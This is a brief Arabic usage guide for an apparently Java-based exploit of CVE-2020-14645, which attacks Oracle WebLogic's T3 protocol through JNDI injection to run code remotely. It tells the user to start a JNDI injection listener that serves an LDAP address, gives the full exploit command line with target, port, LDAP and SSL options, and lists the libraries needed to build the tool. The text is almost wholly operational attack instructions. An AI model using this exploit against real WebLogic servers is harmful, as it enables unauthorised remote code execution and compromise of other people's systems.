
استغلال قائم على Java لـ CVE-2020-14645 يستهدف بروتوكول T3 الخاص بـ Oracle WebLogic مع حقن JNDI لتنفيذ التعليمات البرمجية عن بُعد.
أولاً، استخدم NDI-Injection-Exploit للاستماع وإنشاء عنوان ldap.
java -jar WeblogicT3.jar -Target 127.0.0.1 -Port [7001] -RMI ldap://127.0.0.1:1389/dozvtq [--SSL]
-Target و -RMI إلزاميان، يمكن استخدام --SSL مع https، -Port الافتراضي 7001.
للتجميع الذاتي، تحتاج إلى إضافة coherence.jar و wlfullclient.jar.